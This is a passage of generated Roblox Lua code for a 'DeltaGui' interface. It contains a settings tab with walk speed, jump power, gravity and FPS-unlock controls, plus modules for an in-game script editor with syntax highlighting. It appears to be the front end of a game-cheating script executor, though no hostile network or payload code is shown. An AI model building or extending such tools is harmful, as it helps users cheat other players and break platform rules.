StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings G2L["102"] = Instance.new("Frame", G2L["46"]); G2L["102"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["102"]["BackgroundTransparency"] = 1; G2L["102"]["Size"] = UDim2.new(0.8833174705505371, 0, 0.9945666193962097, 0); G2L["102"]["Position"] = UDim2.new(0.11490308493375778, 0, 0.002866186201572418, 0); G2L["102"]["Visible"] = false; G2L["102"]["Name"] = [[Settings]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed G2L["103"] = Instance.new("Frame", G2L["102"]); G2L["103"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["103"]["Size"] = UDim2.new(0.8807588219642639, 0, 0.06504495441913605, 0); G2L["103"]["Position"] = UDim2.new(0.0572899729013443, 0, 0.05452737957239151, 0); G2L["103"]["Name"] = [[WalkSpeed]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.UICorner G2L["104"] = Instance.new("UICorner", G2L["103"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.TextLabel G2L["105"] = Instance.new("TextLabel", G2L["103"]); G2L["105"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["105"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["105"]["TextSize"] = 12; G2L["105"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["105"]["Size"] = UDim2.new(0.20389226078987122, 0, 0.37544015049934387, 0); G2L["105"]["Text"] = [[Walk Speed]]; G2L["105"]["BackgroundTransparency"] = 1; G2L["105"]["Position"] = UDim2.new(-0.0010769229847937822, 0, 0.27152714133262634, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.TextBox G2L["106"] = Instance.new("TextBox", G2L["103"]); G2L["106"]["TextSize"] = 14; G2L["106"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["106"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["106"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["106"]["Size"] = UDim2.new(0.10997192561626434, 0, 0.7088868021965027, 0); G2L["106"]["Text"] = [[]]; G2L["106"]["Position"] = UDim2.new(0.880412757396698, 0, 0.13300003111362457, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.TextBox.UICorner G2L["107"] = Instance.new("UICorner", G2L["106"]); G2L["107"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.Set G2L["108"] = Instance.new("TextButton", G2L["103"]); G2L["108"]["TextWrapped"] = true; G2L["108"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["108"]["TextSize"] = 12; G2L["108"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["108"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["108"]["Size"] = UDim2.new(0.14156842231750488, 0, 0.6646651029586792, 0); G2L["108"]["Name"] = [[Set]]; G2L["108"]["Text"] = [[Set]]; G2L["108"]["Position"] = UDim2.new(0.7242141366004944, 0, 0.17700013518333435, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.Set.UICorner G2L["109"] = Instance.new("UICorner", G2L["108"]); G2L["109"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.Set.LocalScript G2L["10a"] = Instance.new("LocalScript", G2L["108"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.WalkSpeed.UIAspectRatioConstraint G2L["10b"] = Instance.new("UIAspectRatioConstraint", G2L["103"]); G2L["10b"]["AspectRatio"] = 14.399263381958008; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink G2L["10c"] = Instance.new("TextButton", G2L["102"]); G2L["10c"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["10c"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["10c"]["TextSize"] = 12; G2L["10c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["10c"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["10c"]["Size"] = UDim2.new(0.8820000290870667, 0, 0.06599999964237213, 0); G2L["10c"]["Name"] = [[InviteLink]]; G2L["10c"]["Text"] = [[ Copy Discord Invite]]; G2L["10c"]["Position"] = UDim2.new(0.05668863654136658, 0, 0.35930559039115906, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink.UICorner G2L["10d"] = Instance.new("UICorner", G2L["10c"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink.ImageLabel G2L["10e"] = Instance.new("ImageLabel", G2L["10c"]); G2L["10e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["10e"]["Image"] = [[rbxassetid://12732591607]]; G2L["10e"]["Size"] = UDim2.new(0.043016303330659866, 0, 0.6113002896308899, 0); G2L["10e"]["BackgroundTransparency"] = 1; G2L["10e"]["Position"] = UDim2.new(0.9340682625770569, 0, 0.17465722560882568, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink.UIAspectRatioConstraint G2L["10f"] = Instance.new("UIAspectRatioConstraint", G2L["10c"]); G2L["10f"]["AspectRatio"] = 14.210898399353027; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.InviteLink.LocalScript G2L["110"] = Instance.new("LocalScript", G2L["10c"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits G2L["111"] = Instance.new("TextButton", G2L["102"]); G2L["111"]["TextWrapped"] = true; G2L["111"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["111"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["111"]["TextSize"] = 12; G2L["111"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["111"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["111"]["Size"] = UDim2.new(0.8820000290870667, 0, 0.06599999964237213, 0); G2L["111"]["Name"] = [[Credits]]; G2L["111"]["Text"] = [[ Show Credits]]; G2L["111"]["Position"] = UDim2.new(0.05668863654136658, 0, 0.4601701498031616, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits.UICorner G2L["112"] = Instance.new("UICorner", G2L["111"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits.ImageLabel G2L["113"] = Instance.new("ImageLabel", G2L["111"]); G2L["113"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["113"]["Image"] = [[rbxassetid://12732608625]]; G2L["113"]["Size"] = UDim2.new(0.043016303330659866, 0, 0.6113002896308899, 0); G2L["113"]["BackgroundTransparency"] = 1; G2L["113"]["Position"] = UDim2.new(0.9340682625770569, 0, 0.17465722560882568, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits.UIAspectRatioConstraint G2L["114"] = Instance.new("UIAspectRatioConstraint", G2L["111"]); G2L["114"]["AspectRatio"] = 14.210898399353027; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Credits.LocalScript G2L["115"] = Instance.new("LocalScript", G2L["111"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS G2L["116"] = Instance.new("TextButton", G2L["102"]); G2L["116"]["TextWrapped"] = true; G2L["116"]["TextXAlignment"] = Enum.TextXAlignment.Left; G2L["116"]["TextScaled"] = true; G2L["116"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["116"]["TextSize"] = 12; G2L["116"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["116"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["116"]["Size"] = UDim2.new(0.8820000290870667, 0, 0.06599999964237213, 0); G2L["116"]["Name"] = [[UnlockFPS]]; G2L["116"]["Text"] = [[ Unlock FPS]]; G2L["116"]["Position"] = UDim2.new(0.05668863654136658, 0, 0.5523891448974609, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.UICorner G2L["117"] = Instance.new("UICorner", G2L["116"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.ImageLabel G2L["118"] = Instance.new("ImageLabel", G2L["116"]); G2L["118"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["118"]["Image"] = [[rbxassetid://12732606548]]; G2L["118"]["Size"] = UDim2.new(0.043016303330659866, 0, 0.6113002896308899, 0); G2L["118"]["BackgroundTransparency"] = 1; G2L["118"]["Position"] = UDim2.new(0.9340682625770569, 0, 0.17465722560882568, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.UIAspectRatioConstraint G2L["119"] = Instance.new("UIAspectRatioConstraint", G2L["116"]); G2L["119"]["AspectRatio"] = 14.210898399353027; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.UITextSizeConstraint G2L["11a"] = Instance.new("UITextSizeConstraint", G2L["116"]); G2L["11a"]["MaxTextSize"] = 12; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.UnlockFPS.LocalScript G2L["11b"] = Instance.new("LocalScript", G2L["116"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower G2L["11c"] = Instance.new("Frame", G2L["102"]); G2L["11c"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["11c"]["Size"] = UDim2.new(0.8807588219642639, 0, 0.06504495441913605, 0); G2L["11c"]["Position"] = UDim2.new(0.0572899729013443, 0, 0.15539193153381348, 0); G2L["11c"]["Name"] = [[JumpPower]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.UICorner G2L["11d"] = Instance.new("UICorner", G2L["11c"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.TextLabel G2L["11e"] = Instance.new("TextLabel", G2L["11c"]); G2L["11e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["11e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["11e"]["TextSize"] = 12; G2L["11e"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["11e"]["Size"] = UDim2.new(0.20389226078987122, 0, 0.37544015049934387, 0); G2L["11e"]["Text"] = [[Jump Power]]; G2L["11e"]["BackgroundTransparency"] = 1; G2L["11e"]["Position"] = UDim2.new(-0.0010769229847937822, 0, 0.27152714133262634, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.TextBox G2L["11f"] = Instance.new("TextBox", G2L["11c"]); G2L["11f"]["TextSize"] = 14; G2L["11f"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["11f"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["11f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["11f"]["Size"] = UDim2.new(0.10997192561626434, 0, 0.7088868021965027, 0); G2L["11f"]["Text"] = [[]]; G2L["11f"]["Position"] = UDim2.new(0.880412757396698, 0, 0.13300003111362457, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.TextBox.UICorner G2L["120"] = Instance.new("UICorner", G2L["11f"]); G2L["120"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.Set G2L["121"] = Instance.new("TextButton", G2L["11c"]); G2L["121"]["TextWrapped"] = true; G2L["121"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["121"]["TextSize"] = 12; G2L["121"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["121"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["121"]["Size"] = UDim2.new(0.14156842231750488, 0, 0.6646651029586792, 0); G2L["121"]["Name"] = [[Set]]; G2L["121"]["Text"] = [[Set]]; G2L["121"]["Position"] = UDim2.new(0.7242141366004944, 0, 0.17700013518333435, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.Set.UICorner G2L["122"] = Instance.new("UICorner", G2L["121"]); G2L["122"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.Set.LocalScript G2L["123"] = Instance.new("LocalScript", G2L["121"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.JumpPower.UIAspectRatioConstraint G2L["124"] = Instance.new("UIAspectRatioConstraint", G2L["11c"]); G2L["124"]["AspectRatio"] = 14.399263381958008; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity G2L["125"] = Instance.new("Frame", G2L["102"]); G2L["125"]["BackgroundColor3"] = Color3.fromRGB(13, 13, 13); G2L["125"]["Size"] = UDim2.new(0.8807588219642639, 0, 0.06504495441913605, 0); G2L["125"]["Position"] = UDim2.new(0.05700000002980232, 0, 0.257999986410141, 0); G2L["125"]["Name"] = [[Gravity]]; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.UICorner G2L["126"] = Instance.new("UICorner", G2L["125"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.TextLabel G2L["127"] = Instance.new("TextLabel", G2L["125"]); G2L["127"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255); G2L["127"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["127"]["TextSize"] = 12; G2L["127"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["127"]["Size"] = UDim2.new(0.14991775155067444, 0, 0.37544018030166626, 0); G2L["127"]["Text"] = [[Gravity]]; G2L["127"]["BackgroundTransparency"] = 1; G2L["127"]["Position"] = UDim2.new(-0.0010769232176244259, 0, 0.27152714133262634, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.TextBox G2L["128"] = Instance.new("TextBox", G2L["125"]); G2L["128"]["TextSize"] = 14; G2L["128"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["128"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["128"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["128"]["Size"] = UDim2.new(0.10997192561626434, 0, 0.7088868021965027, 0); G2L["128"]["Text"] = [[]]; G2L["128"]["Position"] = UDim2.new(0.880412757396698, 0, 0.13300003111362457, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.TextBox.UICorner G2L["129"] = Instance.new("UICorner", G2L["128"]); G2L["129"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Set G2L["12a"] = Instance.new("TextButton", G2L["125"]); G2L["12a"]["TextWrapped"] = true; G2L["12a"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["12a"]["TextSize"] = 12; G2L["12a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["12a"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["12a"]["Size"] = UDim2.new(0.14156842231750488, 0, 0.6646651029586792, 0); G2L["12a"]["Name"] = [[Set]]; G2L["12a"]["Text"] = [[Set]]; G2L["12a"]["Position"] = UDim2.new(0.7242141366004944, 0, 0.17700013518333435, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Set.UICorner G2L["12b"] = Instance.new("UICorner", G2L["12a"]); G2L["12b"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Set.LocalScript G2L["12c"] = Instance.new("LocalScript", G2L["12a"]); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.UIAspectRatioConstraint G2L["12d"] = Instance.new("UIAspectRatioConstraint", G2L["125"]); G2L["12d"]["AspectRatio"] = 14.399263381958008; -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Reset G2L["12e"] = Instance.new("TextButton", G2L["125"]); G2L["12e"]["TextWrapped"] = true; G2L["12e"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30); G2L["12e"]["TextSize"] = 12; G2L["12e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal); G2L["12e"]["TextColor3"] = Color3.fromRGB(255, 255, 255); G2L["12e"]["Size"] = UDim2.new(0.14156842231750488, 0, 0.6646651029586792, 0); G2L["12e"]["Name"] = [[Reset]]; G2L["12e"]["Text"] = [[Reset]]; G2L["12e"]["Position"] = UDim2.new(0.5699999928474426, 0, 0.1770000010728836, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Reset.UICorner G2L["12f"] = Instance.new("UICorner", G2L["12e"]); G2L["12f"]["CornerRadius"] = UDim.new(0.699999988079071, 0); -- StarterGui.DeltaGui.MainUi.MainFrame.Tabs.Settings.Gravity.Reset.LocalScript G2L["130"] = Instance.new("LocalScript", G2L["12e"]); -- StarterGui.DeltaGui.MainUi.MainFrame.UIAspectRatioConstraint G2L["131"] = Instance.new("UIAspectRatioConstraint", G2L["25"]); G2L["131"]["AspectRatio"] = 1.1973302364349365; -- StarterGui.DeltaGui.MainUi.MainFrame.DraggableStuff G2L["132"] = Instance.new("LocalScript", G2L["25"]); G2L["132"]["Name"] = [[DraggableStuff]]; -- StarterGui.DeltaGui.FloatingIcon G2L["133"] = Instance.new("ImageButton", G2L["1"]); G2L["133"]["BackgroundColor3"] = Color3.fromRGB(20, 20, 23); G2L["133"]["Image"] = [[rbxassetid://12730597972]]; G2L["133"]["Size"] = UDim2.new(0.07388234883546829, 0, 0.1319999247789383, 0); G2L["133"]["Name"] = [[FloatingIcon]]; G2L["133"]["Visible"] = false; G2L["133"]["Position"] = UDim2.new(0.09859155118465424, 0, 0.01671314239501953, 0); -- StarterGui.DeltaGui.FloatingIcon.UICorner G2L["134"] = Instance.new("UICorner", G2L["133"]); G2L["134"]["CornerRadius"] = UDim.new(0.25, 0); -- StarterGui.DeltaGui.FloatingIcon.LocalScript G2L["135"] = Instance.new("LocalScript", G2L["133"]); -- StarterGui.DeltaGui.FloatingIcon.UIAspectRatioConstraint G2L["136"] = Instance.new("UIAspectRatioConstraint", G2L["133"]); G2L["136"]["AspectRatio"] = 0.9962615966796875; -- Require G2L wrapper local G2L_REQUIRE = require; local G2L_MODULES = {}; local function require(Module:ModuleScript) local ModuleState = G2L_MODULES[Module]; if ModuleState then if not ModuleState.Required then ModuleState.Required = true; ModuleState.Value = ModuleState.Closure(); end return ModuleState.Value; end; return G2L_REQUIRE(Module); end G2L_MODULES[G2L["60"]] = { Closure = function() local script = G2L["60"]; -- Lexer by sleitnick -- Everything else by me, bread. lol. local module = {} local syntax = require(script.Syntax) local getLines = require(script.GetLines) local fakeEditor = require(script.FakeEditor) local textFixer = require(script.TextFixer) local getLine = require(script.GetLine) local tween = require(script.TweenLibrary) local suggestions = require(script.Suggestions) function module.new(frame) local newEditor = script.Editor:Clone() newEditor.Parent = frame local editorObj = fakeEditor.new(newEditor) local textbox = newEditor.Scroll.Source local linesLabel = newEditor.Scroll.Left.Lines local lineHighlight = textbox.LineHighlight local highlightBox = Instance.new("TextLabel") highlightBox.Size = UDim2.new(1, 0,1, 0) highlightBox.Position = UDim2.new(0, 0,0, 0) highlightBox.TextColor3 = textbox.TextColor3 highlightBox.BackgroundTransparency = 1 highlightBox.Name = "Syntax" highlightBox.RichText = true highlightBox.TextSize = textbox.TextSize highlightBox.Font = textbox.Font highlightBox.TextXAlignment = Enum.TextXAlignment.Left highlightBox.TextYAlignment = Enum.TextYAlignment.Top highlightBox.TextStrokeColor3 = Color3.fromRGB(40, 40, 40) highlightBox.TextStrokeTransparency = 0.1 highlightBox.Text = "" highlightBox.Parent = textbox editorObj:SetTheme("default") textFixer.Fix(highlightBox) suggestions:Start(newEditor) textbox:GetPropertyChangedSignal("Text"):Connect(function() syntax.Highlight(highlightBox, textbox.Text) -- Fix tabs textbox.Text = textbox.Text:gsub("\t", " ") --textbox.CursorPosition += 4 -- Update line count linesLabel.Text = getLines.GetLinesString(textbox.Text) end) textbox:GetPropertyChangedSignal("CursorPosition"):Connect(function() -- Position line highlight local lineYPos = ((getLine:GetCurrentLine(textbox) * textbox.TextSize) - math.ceil(lineHighlight.AbsoluteSize.Y / 2)) + 4 if lineYPos ~= lineHighlight.Position.Y.Offset then tween.TweenPosition(lineHighlight, UDim2.new(0, -10,0, lineYPos), 0.1, Enum.EasingStyle.Quad) end end) return editorObj end return module end; }; G2L_MODULES[G2L["61"]] = { Closure = function() local script = G2L["61"]; local module = {} local lexer = require(script.Parent.Lexer) local theme = require(script.Parent.Theme) local textFixer = require(script.Parent.TextFixer) local function ColorToFont(text, color) return string.format( '%s', tostring(math.floor(color.R * 255)), tostring(math.floor(color.G * 255)), tostring(math.floor(color.B * 255)), text ) end function module.Highlight(textbox, source) textbox.Text = "" for tokenType, text in lexer.scan(source) do local currentTheme = theme.current local tokenCol = currentTheme[tokenType] if tokenCol then textbox.Text = textbox.Text .. ColorToFont(text, tokenCol) else textbox.Text = textbox.Text .. text end end textFixer.Fix(textbox) end return module end; }; G2L_MODULES[G2L["62"]] = { Closure = function() local script = G2L["62"]; local theme = { current = nil, themes = { ["default"] = { ["keyword"] = Color3.fromRGB(248, 109, 124), ["builtin"] = Color3.fromRGB(84, 184, 247), ["string"] = Color3.fromRGB(130, 241, 149), ["number"] = Color3.fromRGB(255, 198, 0), ["comment"] = Color3.fromRGB(106, 106, 100), ["thingy"] = Color3.fromRGB(253, 251, 154) }, ["extra 2"] = { ["keyword"] = Color3.fromRGB(249, 36, 114), ["builtin"] = Color3.fromRGB(95, 209, 250), ["string"] = Color3.fromRGB(217, 219, 88), ["number"] = Color3.fromRGB(161, 118, 209), ["comment"] = Color3.fromRGB(116, 122, 101), ["thingy"] = Color3.fromRGB(248, 245, 139) } } } return theme end; }; G2L_MODULES[G2L["63"]] = { Closure = function() local script = G2L["63"]; local module = {} function module.GetLines(text) local amount = 1 text:gsub("\n", function() amount += 1 end) return amount end function module.GetLinesString(text) local lineAmt = module.GetLines(text) local result = "" for i = 1, lineAmt do result = result .. i .. "\n" end -- Remove last \n result = result:sub(1, #result - 1) return result end return module end; }; G2L_MODULES[G2L["64"]] = { Closure = function() local script = G2L["64"]; local fakeEditor = {} -- Main module local textFixer = require(script.Parent.TextFixer) local theme = require(script.Parent.Theme) local syntax = require(script.Parent.Syntax) local editorObj = { SetTextSize = function(self, textSize) local sourceBox = self.Editor.Scroll.Source local syntaxBox = sourceBox.Syntax local linesBox = self.Editor.Scroll.Left.Lines local lineHighlight = sourceBox.LineHighlight sourceBox.TextSize = textSize syntaxBox.TextSize = textSize linesBox.TextSize = textSize lineHighlight.Size = UDim2.new(1, 0,0, textSize + 5) --[[ Might want to fix it manually because adding another \n might cause some instability ]] textFixer.Fix(self.Editor.Scroll.Source.Syntax) return textSize end, Destroy = function(self) self.Editor:Destroy() setmetatable(self, {__index = nil}) table.clear(self) self = nil return nil end, GetText = function(self) local sourceBox = self.Editor.Scroll.Source return sourceBox.Text end, SetText = function(self, text) local sourceBox = self.Editor.Scroll.Source sourceBox.Text = text return text end, ContentToBytes = function(self) local text = self.Editor.Scroll.Source.Text local bytes = {} for _, c in pairs(text:split("")) do table.insert(bytes, string.byte(c)) end return "/" .. table.concat(bytes, "/") end, Hide = function(self) local hiddenLabel = self.Editor.Scroll.Source.Hidden hiddenLabel.Visible = true end, Unhide = function(self) local hiddenLabel = self.Editor.Scroll.Source.Hidden hiddenLabel.Visible = false end, SetTheme = function(self, themeName) local sourceBox = self.Editor.Scroll.Source local syntaxBox = sourceBox.Syntax assert(theme.themes[themeName], "'" .. themeName .. "' is not a valid theme.") theme.current = theme.themes[themeName] -- Update highlighting syntax.Highlight(syntaxBox, sourceBox.Text) end, } function fakeEditor.new(editor) return setmetatable({Editor = editor}, {__index = editorObj}) end return fakeEditor end; }; G2L_MODULES[G2L["65"]] = { Closure = function() local script = G2L["65"]; local module = {} function module.peekBack(self) return self.text:sub(self.position - 1, self.position - 1) end function module.next(self) self.position += 1 self.character = self.text:sub(self.position, self.position) if self.character == "\n" then self.lines += 1 end if self.position < #self.text and self.position < self.cursorPosition then self:next() end end function module.GetCurrentLine(self, textbox) self.position = 0 self.text = textbox.Text .. " " self.cursorPosition = textbox.CursorPosition self.lines = 1 self:next() return self.lines end function module.GetCurrentLineWidth(self, textbox) self.position = 0 self.text = textbox.Text .. " " self.cursorPosition = textbox.CursorPosition self.lines = 1 self:next() -- self.lines is the current line return self.position end return module end; }; G2L_MODULES[G2L["66"]] = { Closure = function() local script = G2L["66"]; local module = {} local tweenService = game:GetService("TweenService") local debris = game:GetService("Debris") -- Custom functions local function default(arg, def) if arg == nil then arg = def end return arg end -- Guis -- function module.TweenScale(frame, scale, timelen, easingstyle, easingdir) local uiscale if not frame:FindFirstChild("$ScaleAnim") then uiscale = Instance.new("UIScale") uiscale.Scale = 1 uiscale.Name = "$ScaleAnim" uiscale.Parent = frame end -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Scale = scale } -- Finally, play tween tweenService:Create(uiscale, tinfo, goals):Play() --debris:AddItem(uiscale, timelen) -- Remove it when animation is done end function module.TweenPosition(frame, position, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(position, "No position provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Position = position } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenSize(frame, size, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(size, "No size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { Size = size } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBackgroundColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BackgroundColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBackgroundTransparency(frame, transparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(transparency, "No transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BackgroundTransparency = transparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBorderColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(color, "No color provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BorderColor3 = color } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenBorderSizePixel(frame, bordersize, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(bordersize, "No border size provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { BorderSizePixel = bordersize } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageTransparency(frame, imagetransparency, timelen, easingstyle, easingdir) -- Errors & defaults assert(frame, "No frame provided") assert(imagetransparency, "No image transparency provided") assert(timelen, "No time length provided") easingstyle = default(easingstyle, Enum.EasingStyle.Sine) easingdir = default(easingdir, Enum.EasingDirection.Out) -- Generate tween info local tinfo = TweenInfo.new(timelen, easingstyle, easingdir) local goals = { ImageTransparency = imagetransparency } -- Finally, play tween tweenService:Create(frame, tinfo, goals):Play() end function module.TweenImageColor3(frame, color, timelen, easingstyle, easingdir) -- Errors & defaults 